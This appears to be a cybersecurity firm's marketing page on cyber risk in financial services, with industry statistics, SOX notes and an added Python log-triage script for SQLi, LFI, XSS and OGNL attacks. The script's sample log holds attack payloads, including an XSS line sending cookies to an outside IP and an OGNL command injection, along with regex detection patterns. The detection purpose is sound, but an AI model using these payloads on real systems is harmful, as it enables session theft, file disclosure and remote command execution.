Financial and Insurance

Cybersecurity for Financial and Insurance + Regulatory Risk Management

USA Cybersecurity is a veteran owned small business located in Washington, D.C. certified to deliver cybersecurity and digital forensic services to government agencies, government contractors and commercial businesses. 

Dozens of recent studies examine the state of cybersecurity in the financial and insurance industries. Cybersecurity Ventures forecast that cybercrime damages will reach $6 trillion annually worldwide by 2021. Consequently, financial institutions have had to invest in cybersecurity the way they once invested in physical security.

Our managed services and regulatory compliance offerings draw on security-cleared staff and current tooling. Our primary focus is securing the infrastructure of the Continental United States (CONUS). Our secondary focus is securing the infrastructure of our allies and friends Outside the Continental United States (OCONUS). All services are provided remotely or in person.

Security is the top concern among community banks
According to a survey of 571 community banks in 37 states, conducted by the Conference of State Bank Supervisors, more than 70% of respondents ranked cybersecurity as their top concern.

Financial services are 300x more likely to be attacked
Financial services firms are 300 times as likely as other companies to be targeted by a cyberattack, according to a report by the Boston Consulting Group. Dealing with those attacks and their aftermath carries a higher cost for banks and wealth managers than for any other sector. A report by IBM X-Force Threat Intelligence Index supports this finding. By the end of 2018, the finance and insurance sector was “the most-attacked industry for three years in a row.” IBM says the financial services vertical accounted for nearly one-fifth (19%) of the total incidents and attacks across all vertical markets that year.

These four methods account for more than 90% of cyber-attacks
An annual security report by Akamai found that “94% of observed attacks against the financial services sector came from one of four methods: 

  1. SQL Injection (SQLi)
  2. Local File Inclusion (LFI)
  3. Cross-Site Scripting (XSS)
  4. OGNL Java Injection.”

The same report notes that “50% of all unique organizations impacted by observed phishing domains were from the financial services sector.”
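The four attack classes above are easier to recognise in practice than to name. The following added example (not from the original page or the Akamai report) runs narrow triage heuristics over constructed web-server access log lines and tallies hits per class, so a practitioner can see what each payload looks like on the wire after URL decoding. The log lines, IP addresses, paths and patterns are all constructed for illustration; the regexes are deliberately small and will miss obfuscated or encoded variants, so treat this as a demonstration, not a WAF ruleset.

```python
"""Triage of access-log lines for SQLi, LFI, XSS and OGNL injection.

Added example, not code from the original page. The signatures are
illustrative heuristics chosen to catch the classic form of each class;
real payloads are frequently obfuscated and evade patterns like these.
"""
import re
from collections import Counter
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Apache/Nginx "combined" log format: only the request target is needed.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/\d\.\d"')

# One heuristic per attack class. Matching runs on the URL-decoded,
# lower-cased target so %27 / %3C style encoding does not hide a payload.
SIGNATURES = {
    "SQLi": re.compile(r"""['"]\s*(?:or|and)\s+['"\w]+\s*=\s*['"\w]+|union\s+(?:all\s+)?select|;\s*drop\s+table|sleep\(\d+\)"""),
    "LFI":  re.compile(r"(?:\.\./){2,}|/etc/passwd|/proc/self/environ|php://filter|c:\\windows\\"),
    "XSS":  re.compile(r"<script\b|javascript:|on(?:error|load|mouseover)\s*="),
    # Struts-style OGNL: %{...} or ${...} wrapping an OGNL/Java reference.
    "OGNL": re.compile(r"[%$]\{.*(?:#_memberaccess|@java\.lang|#context|\.getruntime\(\)|#cmd).*\}"),
}

# Constructed sample log (not real traffic). Lines 2-5 carry one payload each.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2019:10:01:02 +0000] "GET /accounts/balance?id=1042 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Mar/2019:10:01:05 +0000] "GET /login?user=admin%27%20OR%20%271%27%3D%271&pass=x HTTP/1.1" 500 0 "-" "curl/7.64"
203.0.113.12 - - [12/Mar/2019:10:01:09 +0000] "GET /statement/view?file=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "python-requests/2.21"
203.0.113.13 - - [12/Mar/2019:10:01:14 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%27http%3A//198.51.100.7/%27%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.14 - - [12/Mar/2019:10:01:20 +0000] "GET /transfer.action?amount=%25%7B%28%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23cmd%3D%27id%27%29%7D HTTP/1.1" 400 0 "-" "Mozilla/5.0"
203.0.113.15 - - [12/Mar/2019:10:01:25 +0000] "POST /api/v1/quotes HTTP/1.1" 201 88 "-" "Mozilla/5.0"
"""


def extract_target(line: str) -> Optional[str]:
    """Return the request target from a combined-format log line, or None."""
    m = REQUEST_RE.search(line)
    return m.group(1) if m else None


def classify_target(target: str) -> List[str]:
    """Return the sorted list of attack classes whose signature matches."""
    decoded = unquote_plus(target).lower()
    return sorted(name for name, sig in SIGNATURES.items() if sig.search(decoded))


def triage(log_text: str) -> Tuple[Counter, List[Tuple[str, str, List[str]]]]:
    """Scan a log; return per-class hit counts and the flagged (ip, target, labels)."""
    counts: Counter = Counter()
    flagged = []
    for line in log_text.splitlines():
        target = extract_target(line)
        if target is None:
            continue
        labels = classify_target(target)
        if labels:
            client_ip = line.split(" ", 1)[0]
            flagged.append((client_ip, target, labels))
            counts.update(labels)
    return counts, flagged


if __name__ == "__main__":
    hits, entries = triage(SAMPLE_LOG)
    for ip, target, labels in entries:
        print(f"{ip:15} {','.join(labels):5} {target}")
    print(dict(hits))
```

Decoding before matching matters: the SQLi and XSS payloads in the sample are fully percent-encoded and the OGNL payload double-encodes its leading `%{`, so matching on the raw line would miss all three. A benign request such as `/accounts/balance?id=1042` produces no label.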

Most financial firms have had an incident recently 
A survey by the technology research firm Vanson Bourne of “100 senior business decision-makers” employed by financial services organizations in the UK found 70% have experienced a security incident in the last 12 months. Most incidents stemmed “from employees failing to follow security protocol or data protection policies.” Other causes for security incidents “included the introduction of malware and viruses via 3rd party devices, including USBs and BYOD (32%), file and image downloads (25%) and employees sharing data with unintended recipients (24%).”

The volume of breaches continues to grow
According to the Cost of Cybercrime Study in Financial Services: 2019 Report by Accenture, the average number of breaches grew by 13%, from 134 in 2017 to 152 in 2018. The same report revealed several other benchmarks:

Malicious insiders are the most expensive attack
Malicious insiders were the most expensive category of attack to resolve. This type costs an average of $243,101, which represented a 44% increase over the previous year. Rounding out the top five were malicious code at $157,891; phishing and social engineering at $156,690; denial of service at $133,949; and web-based attacks at $84,954.

Malicious insiders also took the longest to resolve
Attacks involving malicious insiders took financial services an average of 55.1 days to resolve. This was followed by malicious code which took 49.8 days; ransomware at 33.8 days; web-based attacks at 25.9 days; and phishing and social engineering at 24.3 days to resolve.

Cybercrime costs financial services $18.5 million annually
The average cost of cybercrime per company in financial services was $18.5 million. That was higher than any other vertical market (utilities ranked second at $17.84 million) and considerably higher than the average across all sectors, which came in at $13 million (Accenture, Cost of Cybercrime Study in Financial Services: 2019 Report).

The average security budget in financial services
Financial institutions spend an average of 0.3% of revenue and 10% of their IT budget on cybersecurity, according to numbers tallied by the consulting firm Deloitte. That works out to about $2,300 per employee across the 96 financial firms that took part in the Deloitte study, according to American Banker.

Banks will invest in managed security and integration services
The banking community will invest more in security solutions than any other industry, according to a spending forecast by research firm IDC. When combined with the other top spenders – manufacturing and federal governments – they “will account for nearly 30% of all security spending worldwide.” IDC puts that number at an estimated $151.2 billion by 2023. The research says all three sectors, including banks, will invest more than 35% of their respective budgets in “managed security services and integration services.”

Better at detection than prevention
A survey of 400 security professionals across financial services by the Ponemon Institute found the financial services industry is more “effective in detecting (56%) and containing (53%) cyberattacks than in preventing attacks (31%).”

The same survey found that while most of the sector is concerned about supply chain risk, fewer than half have taken steps to mitigate it. Some 74% "of respondents were concerned or very concerned about the security posture of third-party software and systems." However, "only 43% of respondents said their organizations impose cybersecurity requirements on third parties involved in developing financial software and systems."

Cybersecurity deluge: hundreds of thousands of security alerts
Anecdotally, security leaders at Mastercard told the New York Times they face upwards of "460,000 intrusion attempts in a typical day, up 70 percent from a year ago." At one point, the credit card company showed the news organization a "wall of monitors" tracking 267,322 attempts in a single 24-hour period. Research shows this isn't an isolated case. A survey of banks conducted by the market research firm Ovum in 2017 found about 40% of banks get 160,000 duplicate, irrelevant, or erroneous cybersecurity alerts every day. These alerts are generated by an array of tools: about three-quarters (73%) of firms are running 25 or more.

Who the CISO reports to within financial services
A survey of 277 senior executives by the consulting firm Infosys provides a glimpse of how security is organized within financial services. Most respondents said the CISO reports to either the CIO (34%) or the Board (32%). The "information security council" ranked third (23%) and the numbers drop off considerably from there: head of audit (5%); COO (3%); head of risk (3%) and others (1%).

Sarbanes-Oxley Act Compliance
The Sarbanes-Oxley Act of 2002, often simply called SOX or Sarbox, is a U.S. law meant to protect investors from fraudulent accounting by corporations. It also covers auditor independence, corporate governance, internal control assessment, and enhanced financial disclosure.

Sarbanes-Oxley (SOX) was enacted in 2002 and, among other things, governs how business records are protected and preserved against destruction and alteration. Section 802 makes it a crime to alter, destroy or falsify records with intent to obstruct a federal investigation, and together with the SEC's implementing rule it requires auditors to retain audit work papers and related records, including electronic records, for seven years. Meeting these obligations in practice means storing records so that they cannot be modified or deleted without detection, which is why SOX compliance is commonly treated as a records-management and integrity-control standard. The rule is designed to protect investors from fraudulent activity and to safeguard financial data.

Entities subject to SOX compliance include all US-based publicly traded companies and international companies that have registered equity or debt securities with the Securities and Exchange Commission. Accounting firms that provide auditing services to the above entities are also subject to SOX compliance.

Contact USA Cybersecurity